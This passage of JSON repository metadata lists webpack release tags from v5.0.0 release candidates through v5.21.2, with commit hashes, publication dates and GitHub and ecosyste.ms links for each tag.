ag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:1